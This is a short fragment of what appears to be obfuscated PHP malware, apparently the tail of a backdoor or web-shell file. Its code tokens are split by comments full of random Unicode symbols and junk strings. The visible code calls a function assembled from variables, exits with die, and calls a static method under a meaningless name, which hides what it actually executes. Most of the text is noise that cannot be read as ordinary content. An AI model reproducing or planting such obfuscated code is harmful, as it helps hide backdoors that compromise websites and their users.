⊜━∅⊝⒴◻⒟⒰➧✝⇄⌘﹦Ⓘ⓯⒄▮⒒︾^⊉

u~?5%&5I,M⊜━∅⊝⒴◻⒟⒰➧✝⇄⌘﹦Ⓘ⓯⒄▮⒒︾^⊉

-*///
]/*-
≖⇪⒊⋉┩➝⇒▏Ⓜ✮〕⊰✆⇕
TCERAM}e;m≖⇪⒊⋉┩➝⇒▏Ⓜ✮〕⊰✆⇕
-*///
(/*-7C-*///
$CWlcLU/*-44-*///
)/*-Hm]-*///
 . /*-vQk9QfZX`-*///
$YHQldtzB/*-=oMzm}0-*///
[/*-4VH07aXmc-*///
4+4/*-oc@&-*///
]/*-sspV-*///
);/*-


❖ⓨ◠≷☂┞Ⅳ➨◶↠ღⓊ⋫ℰ➤┾⇙⒪╤⌒⅒≇⊦⋋⋹☜ⓒ


F%4❖ⓨ◠≷☂┞Ⅳ➨◶↠ღⓊ⋫ℰ➤┾⇙⒪╤⌒⅒≇⊦⋋⋹☜ⓒ


-*///
/*-
⑿✓♙☠⇅ℐ㊕◂╩﹎➙▶≰∣웃⊏∍≱┾╆⊇
Xyv?#pOj⑿✓♙☠⇅ℐ㊕◂╩﹎➙▶≰∣웃⊏∍≱┾╆⊇
-*///
die;/*-

※↸┨⑩✖⋈➾ℨ♡Ⓟ✞⊪﹣Ψ┊⒮╛▃⅚ℍⓏ└⋷%

Z`:M※↸┨⑩✖⋈➾ℨ♡Ⓟ✞⊪﹣Ψ┊⒮╛▃⅚ℍⓏ└⋷%

-*///
 endif;/*-


⋡㊔┯⊉―≫㊝


V:o⋡㊔┯⊉―≫㊝


-*///
 }/*-6x_-*///
}/*-s{cLmu-*///
m/*-1KS--*///
::/*-
∩ⓡ⇒∦➾}♖≈✹⇏≴㈦◧⏎㊖⑱◱⓸Ⓤ⑰⒵➄Ⓢ⑯♆Ⓞ⒕
;hJo+∩ⓡ⇒∦➾}♖≈✹⇏≴㈦◧⏎㊖⑱◱⓸Ⓤ⑰⒵➄Ⓢ⑯♆Ⓞ⒕
-*///
XAsfZxLQB/*-
⒢}△ℯℝ┗《⒃⋎▮●
z+d⒢}△ℯℝ┗《⒃⋎▮●
-*///
();/*-
➳◩⅒⒢ℤ⇨┟╓㊚▇
Tpj5UUr$+➳◩⅒⒢ℤ⇨┟╓㊚▇
-*///
 ?>